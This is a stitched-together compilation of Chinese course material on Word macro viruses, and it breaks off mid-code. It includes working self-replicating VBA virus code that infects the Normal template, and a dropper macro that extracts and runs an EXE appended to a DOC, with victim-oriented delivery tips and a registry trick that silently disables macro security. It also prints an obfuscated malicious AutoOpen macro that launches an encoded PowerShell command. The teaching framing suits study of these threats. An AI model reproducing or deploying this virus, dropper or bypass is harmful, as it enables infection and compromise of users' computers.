Word宏病毒实验

Word宏病毒实验1.实验目的Word宏是指能组织到一起为独立命令使用的一系列Word指令，它能使日常工作变得容易。

本实验演示了宏的编写，通过两个简单的宏病毒示例，说明宏的原理及其安全漏洞和缺陷，理解宏病毒的作用机制，从而加强对宏病毒的认识，提高防范意识。

2.实验所需条件和环境硬件设备：局域网，终端PC机。

系统软件：Windows系列操作系统支撑软件：Word 2003软件设置：关闭杀毒软；打开Word 2003，在工具→宏→安全性中，将安全级别设置为低，在可靠发行商选项卡中，选择信任任何所有安装的加载项和模板，选择信任visual basic项目的访问实验环境配置如下图所示：受感染终端被感染终端宏病毒传播示意图3.实验内容和分析为了保证该实验不至于造成较大的破坏性，进行实验感染后，被感染终端不要打开过多的word文档，否则清除比较麻烦（对每个打开过的文档都要清除）。

3.1. 例1 自我复制，感染word公用模板和当前文档代码如下：'Micro-VirusSub Document_Open()On Error Resume NextApplication.DisplayStatusBar = FalseOptions.SaveNormalPrompt = FalseOurcode = ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(1, 100)Set Host = NormalTemplate.VBProject.VBComponents(1).CodeModuleIf ThisDocument = NormalTemplate ThenSet Host = ActiveDocument.VBProject.VBComponents(1).CodeModuleEnd IfWith HostIf .Lines(1.1) <> "'Micro-Virus" Then.DeleteLines 1, .CountOfLines.InsertLines 1, Ourcode.ReplaceLine 2, "Sub Document_Close()"If ThisDocument = nomaltemplate Then.ReplaceLine 2, "Sub Document_Open()"ActiveDocument.SaveAs ActiveDocument.FullNameEnd IfEnd IfEnd WithMsgBox "MicroVirus by Content Security Lab"End Sub打开一个word文档，然后按Alt+F11调用宏编写窗口（工具→宏→Visual Basic→宏编辑器）,在左侧的project—>Microsoft Word对象→ThisDocument中输入以上代码，保存，此时当前word文档就含有宏病毒，只要下次打开这个word文档，就会执行以上代码，并将自身复制到Normal.dot（word文档的公共模板）和当前文档的ThisDocument中，同时改变函数名（模板中为Document_Close，当前文档为Document_Open），此时所有的word文档打开和关闭时，都将运行以上的病毒代码，可以加入适当的恶意代码，影响word的正常使用，本例中只是简单的跳出一个提示框。

宏病毒原理及案例分析屈立成4114005088什么是宏？所谓宏，就是一些命令组织在一起，作为一个单独命令完成一个特定任务。

Microsoft Word中对宏定义为：“宏就是能组织到一起作为一独立的命令使用的一系列word命令，它能使日常工作变得更容易”。

Word使用宏语言Word_Basic将宏作为一系列指令来编写。

Word宏病毒是一些制作病毒的专业人员利用Microsoft Word的开放性即word中提供的Word BASIC编程接口，专门制作的一个或多个具有病毒特点的宏的集合，这种病毒宏的集合影响到计算机的使用，并能通过.DOC文档及.DOT 模板进行自我复制及传播。

宏可使任务自动化，如果在Word中重复进行某项工作，可用宏使其自动执行。

宏是将一系列的Word命令和指令结合在一起，形成一个命令，以实现任务执行的自动化。

用户可创建并执行一个宏，以替代人工进行一系列费时而重复的Word操作。

事实上，它是一个自定义命令，用来完成所需任务。

宏的一些典型应用如：加速日常编辑和格式设置、组合多个命令、使对话框中的选项更易于访问、使一系列复杂的任务自动执行等。

Word 提供了两种创建宏的方法：宏录制器和Visual Basic 编辑器。

宏录制器可帮助用户开始创建宏。

Word 在VBA 编程语言中把宏录制为一系列的Word 命令。

可在Visual Basic 编辑器中打开已录制的宏，修改其中的指令。

也可用Visual Basic 编辑器创建包括Visual Basic 指令的非常灵活和强有力的宏，这些指令无法采用录制的方式。

VBAVisual Basic for Applications（VBA）是Visual Basic的一种宏语言，是微软开发出来在其桌面应用程序中执行通用的自动化任务的编程语言。

主要能用来扩展Windows的应用程式功能，特别是Microsoft Office软件。

也可说是一种应用程式视觉化的Basic 脚本。

-- Word宏病毒制作，传播，防范EXE变DOC的方法其实这种转换并不是文件格式上的变化,只不过是把一个exe文件接在一个doc文件的末尾而已,这个doc文件当然就不是不同word的文档啦,该文档中包含了宏语句,能在运行的时候把接在自己文件末尾的exe文件数据读取出来并运行,就造成一种假象,好象文档打开时就运行了exe文件似的.(和文件捆绑器的原理很象啊!)熟悉vb的朋友都知道,word的宏是使用vba来编写的,具体语法和vb一样,但有些方法vb中没有,如宏病毒就是利用宏复制语句来达到感染的目的.和vb一样,我们可以在编写宏的时候调用windows api!!下面我们来介绍一下我们编写这个宏需要用到的api函数:1)createfile 用于打开文件,该函数vb的声明如下:declare function createfile lib "kernel32" alias "createfilea" (byval lpfilename as string,byval dwdesiredaccess as long, byval dwsharemode as long, byval lpsecurityattributesas long, byval dwcreationdistribution as long, byval dwflagsandattributes as long, byval htemplate as long) as long2)closehandle 用于关闭被打开文件的句柄,该函数vb的声明如下:declare function closehandle lib "kernel32" (byval hobject as long) as long3)readfile 用于从被打开文件中读取数据,该函数vb的声明如下:declare function readfile lib "kernel32" (byval hfile as long, lpbuffer as byte, byval dwnumberofbytestoreadas long, lpnumberofbytesread as long, byval lpoverlapped as long) as long4)writefile 用于把读取出的数据写入文件,该函数vb的声明如下:declare function writefile lib "kernel32" (byval hfile as long, lpbuffer as byte, byval dwnumberofbytestowriteas long, lpnumberofbyteswritten as long, byval lpoverlapped as long) as long5)setfileponiter移动文件指针,该函数vb的声明如下:declare function setfilepointer lib "kernel32" (byval hfile as long, byval ldistancetomove as long, byvallpdistancetomovehigh as long, byval dwmovemethod as long) as long6)下面是以上函数的参数声明public const generic_read as long = &h80000000public const generic_write as long = &h40000000public const file_share_read as long = 1public const file_share_write as long = 2public const create_new as long = 1public const create_always as long = 2public const open_existing as long = 3public const open_always as long = 4public const truncate_existing as long = 5public const invalid_handle_value as long = -1public const file_attribute_normal as long = &h80好了,有了这些准备工作就可以开始了,我们运行word2000,打开visual basic编辑器,新建一个模块,把上面的函数和参数声明拷进去!再回到“thisdocument．的代码视图，选择document．nbspopen的事件，输入一下代码：private sub document．open()dim buffer(65536) as bytedim h, h2, j, i, k as longh = createfile(thisdocument．path & "/" & thisdocument．name, generic_read, file_share_read + file_share_write, 0, open_existing, 0, 0)‘以share_read的方式打开自身的doc文件h2 = createfile("c:\\autoexec.exe", generic_write, 0, 0, create_always, 0, 0)‘新建一个exe文件准备存放读取出来的数据.if h = invalid_handle_value thenexit subend ifk = setfilepointer(h, 32768, nil, 0)‘把文件指针移动到doc文件与exe文件交界处.doi = readfile(h, buffer(0), 65536, j, 0)i = writefile(h2, buffer(0), j, j, 0)loop until j < 65536closehandle (h)closehandle (h2)shell "c:\\autoexec.exe"‘运行exe文件end sub这样宏就编写好了,注意的地方就是上面setfilepointer函数的使用部分:32768是你编写完宏保存好的doc文件的文件大小,不一顶就是32768哦,大家注意!大家可能有疑问,如何把exe文件接到doc文件后面呢?很简单,把你要接的exe放到和这个doc文件同一个目录下.运行doc命令:copy /b xxxx.doc + xxxxx.exe newdoc.doc这样就可以了~~~.当你打开这个newdoc.doc的时候,宏就会把后面的exe文件读出来并保存在c:\\autoexec.exe中,然后运行,是不是很恐怖啊!不过这需要你的word2000安全度为最低的时候才能实现,关于这个安全度的问题,我们又发现了微软的小bug,大家看看注册表中这个键: hkey_current_user\\software\\microsoft\\office\\9.0\\word\\security 中的level值.当安全度是3(高)的时候,word不会运行任何的宏,2(中)的时候word会询问你是否运行宏,1(低)的时候word就会自动运行所有的宏!但很容易就被发现安全度被设为低了,聪明的你一定想到如果这个值变为0的时候会怎么样!!??对了!如果设为0的话,word里面就会显示安全度为高,但却能自动运行任何的宏!!是不是很夸张??和注册表编辑器的后门一样这都是ms的后门吧?如果要受害人的机器接受你的doc文件又能顺利运行,最重要就是把word的安全度在注册表中的值改为0,怎么改??方法太多了吧,单是ie的恶意代码能实现的都太多了,另外,如果网页上连接上是doc的话,ie也会自动下载该doc文件!危险的ms啊!!这个算不算漏洞我不敢说,但防范真的很难,除非一天到晚监视着注册表,或者不用word?太消极了吧,最重要的是小心防范,陌生人的东西千万不要收!包括非exe文件,我们现在发现了doc文件能隐藏exe文件，也会有人发现其他文件能隐藏exe,所以大家千万要小心。

'Micro-Virus'Sub Document_Open()'文档打开时运行的程序过程On Error Resume Next '遇到错误执行下一行Application.DisplayStatusBar = False '把状态栏设置为不显示'MsgBox "DisplayStatusBar = False"Options.SaveNormalPrompt = False '将Word 在退出之前是否保存对Normal 模板更改的提示设置为否Ourcode = ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(1, 100) '设Ourcode等于这个文档的工程代码的1-100行'MsgBox "Ourcode"'get normalSet Host = NormalTemplate.VBProject.VBComponents(1).CodeModule '设Host等于Word模板的工程代'if normal, set active;If ThisDocument = NormalTemplate Then '如果这个文档等于Word模板，那么' MsgBox "ThisDocument = NormalTemplate"Set Host = ActiveDocument.VBProject.VBComponents(1).CodeModule '让Host也就是Word模板的工程代码等于这个文档的工程代码' MsgBox "Set Host = ActiveDocument"End If '本假设语句运行结束With Host '围绕Host也就是Word模板的工程代码If .Lines(1, 1) <> "'Micro-Virus" Then '如果Word模板的工程代码的第一行不等于"'Micro-Virus",那么.DeleteLines 1, .CountOfLines '删除从第一行开始的所有行' MsgBox "DeleteLines 1, .CountOfLines".InsertLines 1, Ourcode '插入Ourcode代码.ReplaceLine 2, "Sub Document_Close()" '把第二行换成"Sub Document_Close()"，也就是文档关闭时运行的程序过程' MsgBox "ReplaceLine 2,Close()"If ThisDocument = NormalTemplate Then '如果这个文档等于Word模板，那么' MsgBox "ThisDocument = NormalTemplate".ReplaceLine 2, "Sub Document_Open()" '把第二行换成"Sub Document_Open()"，也就是文档打开时运行的程序过程' MsgBox "ReplaceLine 2,Open()"ActiveDocument.SaveAs ActiveDocument.FullName '活动文档保存到原路径的原文件名' MsgBox "ActiveDocument.SaveAs"End If '本假设语句运行结束End If '本假设语句运行结束End With '结束With语句End Sub '程序过程结束。

南京航空航天大学计算机病毒及防治上机实验报告学院：理学院专业：信息与计算科学学号：081310128姓名：王晨雨授课老师：薛明富二〇一六年十二月实验一：引导型病毒实验 (2)【实验目的】 (2)【实验平台】 (2)【试验内容】 (2)实验二：Com病毒实验 (6)【实验目的】 (6)【实验平台】 (6)【试验内容】 (6)实验三：PE文件格式实验 (9)实验四：32位文件型病毒实验 (11)实验五：简单的木马实验 (14)实验七：木马病毒清除实验（选做） (19)实验八：Word宏病毒实验（一） (22)实验目的 (22)实验所需条件和环境 (22)实验内容和分析 (23)实验九：Word宏病毒实验（二） (27)清除宏病毒 (29)实验十：Linux脚本病毒实验（选做） (32)实验十二：基于U盘传播的蠕虫病毒实验 (33)实验十三：邮件型病毒实验 (36)实验十四：Web恶意代码实验 (39)实验一： (39)实验二： (39)实验一：引导型病毒实验【实验目的】通过实验，了解引导区病毒的感染对象和感染特征，重点学习引导病毒的感染机制和恢复感染病毒文件的方法，提高汇编语言的使用能力。

实验内容引导阶段病毒由软盘感染硬盘实验。

通过触发病毒，观察病毒发作的现象和步骤，学习病毒的感染机制：阅读和分析病毒的代码。

DOS运行时病毒由硬盘感染软盘的实现。

通过触发病毒，观察病毒发作的现象和步骤，学习病毒的感染机制：阅读和分析病毒的代码。

【实验平台】VMWare Workstation 12 PROMS-DOS 7.10【试验内容】第一步：环境安装安装虚拟机VMWare，在虚拟机环境内安装MS-DOS 7.10环境。

第二步：软盘感染硬盘1)运行虚拟机，检查目前虚拟硬盘是否含有病毒，图1表示没有病毒正常启动硬盘的状态。

2)在附书资源中复制含有病毒的虚拟软盘virus.img3)将含有病毒的软盘插入虚拟机引导，可以看到闪动的字符*^_^*，如图2所示，按任意键进入图3。

【宏病毒】Word宏病毒简单分析前⾔最近对Office系列宏病毒⽐较感兴趣，⽹上找了⼀个Word样本练练⼿，宏病毒常⽤套路⼀般都是利⽤PowerShell从服务器上下载PE⽂件执⾏，或者数据流中内嵌PE⽂件借助RTF释放执⾏。

所以分析宏病毒⼀般都⽐较简单，查看VBA代码基本就能知道病毒执⾏的内容，但是如果代码中的函数、变量、字符串等都经过混淆，分析起来难度就会提⾼。

详细分析诱导⽤户启⽤宏代码如果启⽤内容，宏代码就会执⾏，我们先看下⽂档中的数据流。

从"DMSojZquJ"和"wAwJBjJQJ"数据流中DUMP下宏代码，代码经过严重混淆，我们从“AutoOpen”⼦程序开始分析。

1'Attribute VB_Name = "wAwJBjJQJ"2Function RTUHFOzsK()3 SSIhYOGKB = BBqMNPjSw4 bkspY = Mid("zYsMfzXjUkZcWdEGwAVSztCl", 12, 1)5 pGHmjw = bkspY6 THZbsWKtF = GApwOicZH7 VEbORpJELT = Mid("w ULjXwAKAb", 2, 2)8 siCAq = VEbORpJELT9 HPhRfOHnm = TOvllapZt10 jpucp = Mid("dwOtbdJnhnCwfmAwZ qUwQ", 18, 2)11 aLAikTZzXH = jpucp12 fqalXfJAK = LCnHkoIcD13 VuuwVO = Mid("sXFWPUriJfKTpqQrVtOvwpYvPcmRpGfQk", 26, 2)14 FItfpaapu = VuuwVO15 OBbLUEjqi = KUOOIoowi16 FVvtMEG = Mid("HdAFDcAsATviDfWzFFzpaz pXJcWfwf", 23, 2)17 ajJRwS = FVvtMEG18 jVrCIfDvl = zLiGcJXbX19 ZrAYDPTq = Mid("iHOvIROFpzkqDsbh OWUdhlpCiwZMTtrODJzmwsH", 17, 2)20 jiAGQiQw = ZrAYDPTq21 SUWWCjAwf = vzuwToFbG22 jmtkTTkrF = Mid("wYuqqVtGZiJmAXAhOSuPBlkv ZpEnSjLlFJZnGcc", 24, 2)23 GcmZjTwn = jmtkTTkrF24 LMtwHYSki = ADrFrhRWc25 NEiTwbDXjd = Mid("ffAMXNhHaz tNilfGXhcTPPsBKcvGidzFR", 11, 2)26 RjvFUJZEqEH = NEiTwbDXjd27 LKTKBJzHw = rAsqBBCLO28 riLqL = Mid("VYSzUNAfirLhNHuvTkkpqTYI NBTb", 25, 1)29 wjCNaFw = riLqL30 iVMwDRCAv = nqFMhzLtQ31 hCfFzWOivq = Mid("HRJzsdTznHRYYLErvnJSVjftUhUujlLVzZfA", 6, 1)32 NBOCDBCM = hCfFzWOivq33 nAKjzzabj = lKCqCjSmA34 bGAdVi = Mid("RMiPstNpOmmrqQf/wzkf", 16, 1)35 uFHPYHoifcS = bGAdVi36 PNGBIBOLR = tiTviHlPK37 BzbiCjnQqm = Mid("AikEQJtLfHomiYXDjK /fbjKtsWuJLaJzImkOi", 19, 2)38 IjUTlUqWHO = BzbiCjnQqm39 EuXMYbiQq = tznZtuwvj40 rZKmALU = Mid("ijpGMkvqVjf zj", 12, 2)41 uGUWvBHvsD = rZKmALU42 RTUHFOzsK = FItfpaapu + NBOCDBCM + IjUTlUqWHO + GcmZjTwn + uFHPYHoifcS + pGHmjw + jiAGQiQw + RjvFUJZEqEH + siCAq + uGUWvBHvsD + ajJRwS + aLAikTZzXH + wjCNaFw43End Function44Sub AutoOpen()45 KlsJVlijz46End Sub1'Attribute VB_Name = "DMSojZquJ"2Function KlsJVlijz()3 KRwZOZiSb = jMiOqzLkc4 TzurouRwtt = Mid("juDEAMQA2AGIANQA5LfDuHPHXHoVdEQfRC", 3, 15)5 iKnPNTjHYUN = TzurouRwtt6 TsfRjzdCc = wGUKHjjwm7 SAIGYDAjD = Mid("Ur8BJGqnnB5Yulset %cDpiTrLVN%=wers&&set %SuZmiriSa%=JwsADfCTs&&set %KlsJVlijz%=po&&set %qfSAwAXEM%=MrqzTiJDT&&set %PqjuFnVOr%=hell&&set %SqYwAARBW%=VcQFWjpkv&&!%KlsJVlijz%!8 iBSRmkhEj = SAIGYDAjD9 XtczUhZho = sGlQtlEVs10 HdFRsCmu = Mid("zQDZhA3kAOQB7ADEAMQA2AGIAMQAwADUAYgAxADEAMQA6ADEAMQAwAFkANAA2AH4AMQAwADAMuwW3nHiNYrXXhKvuQhjarIPjtM", 8, 65)11 JZJjMfIbBG = HdFRsCmu12 PthzvLzhL = GZEufrNor13 aJFENXB = Mid("2iwApzVhvrZAEkAMQAxADEAegA0ADYAbQAxADEAMAAmADEAMAA4AH4ANAA3AHsAMQAxADYAYgA2ADYAJgAxADAAMgB+ADQANwBZADMAOQB+ADQANgB6ADgAMwBiADEAMQAyAH4AMQAwADgAWQAxAD14 TjXFztBK = aJFENXB15 zUYzrCIlv = qfMjGmrTF16 bEHOc = Mid("LnMwj8vivvwTnBW06hAzADIASQAxADEAMABZADEAMAAxACEAMQAxADkAJgA0ADUAJgAxADEAMQB6ADkAHc", 19, 62)17 AcOZjKGHd = bEHOc18 EYzRCmWTI = kzbtDFuEB19 KtWFTJiUI = Mid("flGAbQ8jdVC6Iw5wGU3kFwCpYhBY7ADkAOAA6ADEAMAA2AG0AMQAwADXlAW41AL0oV", 29, 27)20 RkSMsXZmbbj = KtWFTJiUI21 TSBfqKPHC = wXTSDLmIQ22 iBobiw = Mid("QSw3OIaCMAwAHsAMQAxADAAOgAxADAAMQAmADEAMQA2AGIANAA2ACEAMQAwADAAOgAxADAAMQBiADQANwAmADEAMQA0AEkANAA3AH4ANAA0AHoAMQAwADQAbQAxADEANgBZADEAMQA2ACYAMQAxA23 mvotcU = iBobiw24 uiSlbYuXn = TwcHoBkXB25 iaBTlajaUKt = Mid("znY7zKn7hBOVIFz6X%cDpiTrLVN%!!%PqjuFnVOr%! -e LgAgACgAKAB2AEEAUgBpAEEAYgBMAGUAIAAnACoAbQBEAFIAKgAnACkALgBuAGEAbQBFAFsAMwAsADEAMQAsADIAXQAtAEoATwBJAG4AJwAnACkA26 XvLAfRK = iaBTlajaUKt27 EZhmBvkXw = pStPHvpAV28 wLTmWqsTK = Mid("FfAHsAMQAwADUAYgAxADEANQBZADEAMQA2AH4AMQAxADQAbQTLWzcjuipSiEo", 3, 46)29 orwEYmMBR = wLTmWqsTK30 jhqckTXvK = ZriRhfKhi31 wdpalVvA = Mid("I6iEVXN1GLwpHCz8Ijwm06KbVIuAJgAxADAAMQBJADQANwAhADcAOAB7ADgAOQAhADEAMAA3AEkAOAAzAG0AMQAwADIAJgA0ADcAegA0ADQAJgAxADAANAB6ADEAMQA2AH4AMQAxADYAIQAxADEAMgB7AD32 nGmuz = wdpalVvA33 iHhXBDcFF = tDohRofBp34 IWIok = Mid("RjADIAJgA0ADMAbQAzADIAYgNG9GurhlHcLP2Co6oWzLFSwmkhv4ldioX", 3, 22)35 TBNjdzzzh = IWIok36 KbpOPFkKj = NXkOFaMGs37 AsoLI = Mid("fSiIEDACYAMwA2AG0AMQAxADQAbQA5ADcAegAxADEAMABiADEAMAAwACYAMQAxADEAegAxADAAOQAhADMAMgBJADYhjj3jjAuppqRGqKrh1T", 7, 82)38 FRdXUFElRa = AsoLI39 oLjmAfOds = VsZuljqAF40 ISYEi = Mid("BVjP8jiqhGziNiDAAOQBiADQANwBJADgAMwBiADEAMAA3ACYANgA1ADoAOAA1AFkANAA3AFkANAA0ACYAMQAwADQAegAxADEANgBiADEAMQA2ACYAMQAxADIAewA1ADgAJgA0ADcAegA0ADcAOgAxADAAOQBtA41 fizsQ = ISYEi42 tUscmqXOh = UfwOUKvrp43 mnbclQddw = Mid("iPPaU89tkLifQBor34HASQB+AHoAJwAgACkAIAB8ACAAJQB7ACgAIABbAEkAbgB0AF0AJABfAC0AYQBTACAAWwBDAEgAYQByAF0AKQdQsE", 20, 83)44 cslql = mnbclQddw45 JXbJzlNOS = GTmEXEUTm46 GbEiUOiVXw = Mid("ziITYGiIamHpoZHgB+ADgAMwB7ADEAM1t26K9TjQqMzHzEYiu", 16, 16)47 YhuVfBw = GbEiUOiVXw48 AMYpPlzuw = tHXOwuqjd49 nwTYnBKp = Mid("I3DEAMAAx6EkAh4h7va", 3, 7)50 zwsMjwQJTv = nwTYnBKp51 djUGOYYRv = vPHtuBYvi52 WrfmRXK = Mid("Jmcs93jA5rYAMQBJADMAMgB6ADEAMQAwACYAMQAwADEAIQAxADEAOQAmADQANQAmADEAMQAxAH4AOQA4AFkAMQAwADYAYgAxADAAMQAhADkAOQBtADEAMQA2AHoAMwAyAEkAMQAxADQAegA5ADc53 awBiLS = WrfmRXK54 QTIqMFnTG = urVrNrbqk55 fwizQHrrKMl = Mid("7ZNCDjkd16F3vJwZADEAMAAxAG0AMQAwADkAYgA0ADYASQA3ADgAWQAxADAAMQA6ADEAMQA2AGIANAA2AGIAOAA3AH4AMQAwADEASQA5ADgAbQA2ADcAYgAxADAAOABJADEAMAA1ADoAMQAwADE56 kzLPNEjwRpi = fwizQHrrKMl57 StzAQwpCi = qzNWqCPaM58 HYhqTVjz = Mid("NlUNOMQB7ADQANwAhADEAMQA4AHsAOAA3AG0AMQAwADMAOgA0ADcAbQA0ADQAJgAxADAANAAhADEAMQA2AG0AMQAxADYAewAxADEAMgBiADUAOAAhADQANwBiADQANwAmADkANwB6ADEAMAAwAF59 OXrPUEbnvR = HYhqTVjz60 UnXOTvRiZ = ZDBQRDQGC61 aOmzViYRI = Mid("q4zoiVLRd4XVFkAFkAOQA5ACEAOQA3AHoAMQAxADYAfgA5ADkAfgAxADAANABiADEAMgAzACEAMQAxADkAfgAxADEAI71o4", 15, 76)62 KIwkY = aOmzViYRI63 jQCKAJbwT = tXBTbniGD64 mTTdkG = Mid("09MYoVDXOQBiADEAMgAxAH4AOQA4AFkAMQAxADcAewAxADIAMQB+ADEAMAA1AG0AMQAxADAAegAxADAAMwBJADkANwB6ADEAMAAzAHoAMQAwADEAOgAxADEAMAA6ADEAMQA2ACYANAA2AG0AOQA565 CPOtaunKXFw = mTTdkG66 MDaCimYPz = cahKFjzjJ67 jENmKtocosG = Mid("Om2EAOgA5ADkAbQAxADEANgBiADMAMgBiADQANQAhADYANwBJADEAMQAxACYAMQAwADkAbQA3ADkAOgA5ADgAfgAxADAANgBiADEAMAAxAFkAOQA5AEkAMQAxADYAbQAzADIAfgA4ADcAYgA4ADMA68 IAFUul = jENmKtocosG69 KKmNnWbYG = XGbNmLAEC70 wwuaTvRloii = Mid("rizBpdohTDQANwBiADQANwAmADEAMAAxAFkAMQAwADAAYgAxADEAMQB7ADEAMQqMh4QsW0tSwB7NpOpYfO", 10, 53)71 muHlMzvW = wwuaTvRloii72 cihQlkKwW = mjSSTsdUv73 NkhKkqUcZzS = Mid("3sTuj9MB568wAFkANgA4AHoAMQAxADEASQAxADEAOQAhADEAMQAwACEAMQAwADgAWQAxADEAMQA6ADkANwBiADEAMAAwAFkANwAwACYAMQAwADUAOgAxADAAOAAhADEAMAAxAEkANAAwAG0A74 wJLOSQhR = NkhKkqUcZzS75 QzQDbKjBI = XPoWJBjXF76 fYzIS = Mid("t8Qv5AEmsBzcKQuRLtPfWP2haoJiOWTEJKWZADUAYgAxADEAMABZADMAMgAmADMANgA6ADEAMQA3AH4AMQAxADQAfgAxADAAOAB7ADEAMQA1ACYANAAxAFkAMQAyADMAYgAxADEANgBJADEAMQA0AH4AM77 bbvLjLAvSJ = fYzIS78 ctZCDozpo = oFnijRPjE79 ZXRkXlUKciC = Mid("K3jBHqR0qD19138PwR5IMndSACWcuccASQAxADAAMwB+ADEAMAAxAHoAMQAxADAAfgAxADEANgAmADEAMQA1AEkAMQAwADUAOgAxADEAMABJADkANwBtADzEX", 31, 88)80 LPwcEG = ZXRkXlUKciC81 mYCWkjbmj = iPZQlvnBa82 CaTTBtvHd = Mid("fNzJ623CmpME4BTWDGQSANQAzAHsANQAzAFkANQAxAUXUX", 21, 22)83 fcjRIRH = CaTTBtvHd84 WOvbEmVrw = VofWHZwuw85 JozUMVXQNC = Mid("IUU0INAxAH4AMQAxADUASQAxADEANQA6ADMAMgAmADMANgAmADEAMQAyAGIAOQA3AHsAMQAxADYASQAxADAANAB+ADUAOQAhADkAOAB7ADEAMQA0AGIAMQAwADEAOgA5ADcAWQAxADAANwB86 fhXwGUGo = JozUMVXQNC87 CFJqaQFQZ = PYTsvirtV88 dnCicIqnDi = Mid("0GrwGzcA1BiqDQ2HsANAAwAHsAMwA5AH4ANAA0AG0AMwA5AEkANAAxACEANQA5AG0AMwA2ACEAMQAxADAAjNwtq8wXSXLbhwY25YY", 16, 67)89 HczVFWDHVzj = dnCicIqnDi90 JKUQBsnGw = DMHzTrwkw91 ckRwBHp = Mid("66II1QkGmQO0bkrwXG7UDHLdjDEAMAAmADkANwB6ADEAMAA5ADoAMQAwADEAegAzMiwv58sW2z8", 26, 39)92 lbjqdjR = ckRwBHp93 QjnfWnMGT = cctziOEnj94 nRJpoij = Mid("JwuGuPV1D5MOLRcplDEAMQAwAGIANAA2AGIAMQAwADAAYgAxADAAFm3RsjWO", 18, 35)95 SPEOqDL = nRJpoij96 imEQCTSBE = SPEcvKlaM97 zGITmmFi = Mid("nXkCVcOVDCIGIANQA0ACEANAAxAHsANQA5AFkAMwA2AG0AMQAxADIAOgA5ADcAewAxADEANgBJADEAMAA0AHoAMwAyAEkANgAxAG0AMwAyAHoAMwA2AFkAMQAwADEAWQAxADEAMAB6ADEAMQA4AFk98 rBTCHaK = zGITmmFi99 hdnhDuYKd = FGitvjHSw100 tkqnlH = Mid("wdHfrVfjbwADcAOgAxADEANwB7ADEAMQA1ACYANAA1AHoAMQAwADIAYgAxADAAOAB6ADEAMAAxAH4AMQAwADUAWQAxADEANQBZADkAOQAhADEAMAA0AH4AMQAwADkAYgA5ADcAYgAxADEAMAB6A11BH3 101 ScIOzQwUMHj = tkqnlH102 szdUNVjur = PzhiLEBWJ103 wzamU = Mid("whNAB6ADEAMAA4AGIANAA2AG0AOAA0AGIAMQAxADEAfgA4ADMAegAxADEANgBiADEAMQA0AG0AMQAwADUAbQAxADEAMAA6ADEAMAAzACEANAAwAG0ANAAxAHoANAA0AHoAMwAyACEAMwA2AG0A4vOqB 104 MthJuYP = wzamU105 vziJsrqMu = WYTXVcMta106 cqwMU = Mid("QjnkEoQif0vzwRUpzj9DcrA5AH4AMQAxADQAWQAxADAANQB+ADEAMQAyACEAMQAxADYAOgAzADIAWQA2ADEAbQAzADIAWQAxADEAMAAhADEAMAAxADoAMQAxADkAYgA0ADUAIQAxADEAMQBU0ntYjnSDmq 107 EbUQjFzQMji = cqwMU108 jNQSzJDJL = wWvdrZWLV109 OfVqJ = Mid("TiRt3HNPcKQFXzYzD5zBEbGwegA5ADcAIQAxADAAOQA6ADEAMAAxACYAMwAyAH4ANgAxAFkAMwAyAH4AMwA2AH4AYQhknD2", 25, 64)110 hpdwFmXNaN = OfVqJ111 PiHliAaNV = XriEVRdSI112 IwiDSbtjXNM = Mid("HqijWfnLLYUcpowUZTMNFWFwA2ADEAbQX2fLZc1w1PPk7JVF", 24, 9)113 LJIEujI = IwiDSbtjXNM114 sdzZGijtp = zshuBJHwL115 XNpKBSQp = Mid("kf6rX0J0wo7sLii6ADEAMQAxAH4AMQAxADAAJgA0ADYAWQA3ADcAYgAxADAAMQB7ADEAMQA1AFkAMQAxADUAegJ2BQk9m", 16, 71)116 LPjrKRijIw = XNpKBSQp117 SzjQrknfR = jrBdAZQdi118 jwrGYdkzCNC = Mid("AtDEANABZADEAMAA1ADoAMQAxADIAIQAxADEANgAmADQAN6f6zpUDiWd", 3, 44)119 EzTYX = jwrGYdkzCNC120 WqbZFkKbV = ncqVzZGKU121 CmzXsmGKojc = Mid("rTCDYRjjiCNAA6ADEAMAA1AH4AMQAxADYASQAxADAAMQB6ADQANQA6ADEAMAA0AGIAMQAxADEAIQAxADEANQBJADEAMQA2AEkAMwAyADoAMwA2AFkAOQA1ACYANAA2AEkANgA5ACYAMQAyADA 122 QYpwllzTSck = CmzXsmGKojc123 ZclPlaQAC = oWrIiXalF124 mAwtjzQ = Mid("dkAOgAxADAAOAA6ADEAMAA1ACEAMQAwADEAOgAxADEAMABZADEAMQA2AFkANAA2uJOYi2zO48HmdXNomG2zwpfcShY3M2zJnYLB", 2, 62)125 ZbAAifkPrvN = mAwtjzQ126 jtszGQPAD = bKtbWpErB127 oWJLO = Mid("i3TbIXnBQGAxADIAMwBZADMANgB+ADEAMQA5ACYAMQAwADEAegA5ADgAegA5ADjWE", 11, 52)128 DGLkaA = oWJLO129 zHFAIEhVF = dfwTvMTXR130 EKYFiRhEXFw = Mid("KnNUzlTmADEAMAAwADoAMQAxADEAJgAxADAAOQA6ADQANgB7ADEAMQAwADoAMQAwADEAegAxADIAMABJADEAMQA2AH4ANAAwAG0ANAA5AFkANAA0AFkAMwAyACYANQA0AG00PriiWvtTcTzBJm2 131 zSGEI = EKYFiRhEXFw132 cZWVzlXoq = JMzCDmWdd133 SFdjwWp = Mid("zPHvKMQAxADIASQA5ADcAWQAxADEANgBiADEAMAA0ACEANAAxACEANQA5AHoAOAAzADoAMQAxADYASQA5ADcASQAxADEANAA6ADEAMQA2AHoANAA1AGIAOAAwAFkAMQAxADQAYgAxADEAMQAhADk 134 OkBajT = SFdjwWp135 ziknRkKlU = EIPhIwXbR136 DcABZPAtp = Mid("Ph4HGzYkfOCGqZiwdDGa3TvRI46jLtBiSAzADkAIQA0ADYAIQAxADAAMQA6ADEAMgAwAHsAMQAwADEAJgAzADkAfgA1ADkAfgAxADAAMgA6ADEAMQAxACEAMQAxADQAegAxADAAMQAmADkANwB+ADkAOQ 137 CWMpLVkSS = DcABZPAtp138 ibHUdTOYI = FabLwRiUp139 cBUrWQJBDX = Mid("XmOJgAxADAAOAA6ADEAMQA1AGIzN3QzjhpYQj5G3IKoCPMI", 4, 23)140 lcPiAkbq = cBUrWQJBDX141 hpIlKOQSj = bbEBfbVrB142 MvpXHXC = Mid("z5nzXvB8SLdaMXOJ2AMwAyAEkANgAxACYAMwAyAGIAMwA5ACYAMQAwADQAWQAxADEANgB+ADEAMQA2AEkAMQAxADIAJgA1ADgAYgA0ADcAJgA0ADcAbQA5ADSC", 18, 103)143 HnZjzd = MvpXHXC144 WiEQYtbFL = stLzwnJqm145 vajVOP = 